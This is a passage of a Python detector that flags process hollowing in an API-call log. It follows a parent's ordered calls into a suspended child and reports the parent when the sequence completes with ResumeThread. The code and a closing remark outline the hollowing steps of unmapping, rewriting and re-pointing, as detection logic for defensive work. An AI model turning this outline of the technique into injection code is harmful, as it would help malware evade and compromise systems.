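        if state is None or state["parent"] != ev["pid"]:
            continue
        if ev["api"] == "WriteProcessMemory":
            state["writes"] += 1
        if ev["api"] == HOLLOW_STEPS[state["step"]]:
            state["step"] += 1          # repeated or unrelated calls do not advance
        if ev["api"] == "ResumeThread":
            # A resume ends tracking; only the complete ordered sequence is reported.
            if state["step"] == len(HOLLOW_STEPS):
                findings.append({"parent_pid": state["parent"], "child_pid": target,
                                 "self_spawn": state["self_spawn"],
                                 "remote_writes": state["writes"]})
            del tracked[target]
    return findings

if __name__ == "__main__":
    for finding in find_hollowing(parse_log(SAMPLE_LOG)):
        print(finding)
```

The launcher that merely starts a child suspended and resumes it is not reported; only the parent that also unmaps, rewrites and re-points the child is.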
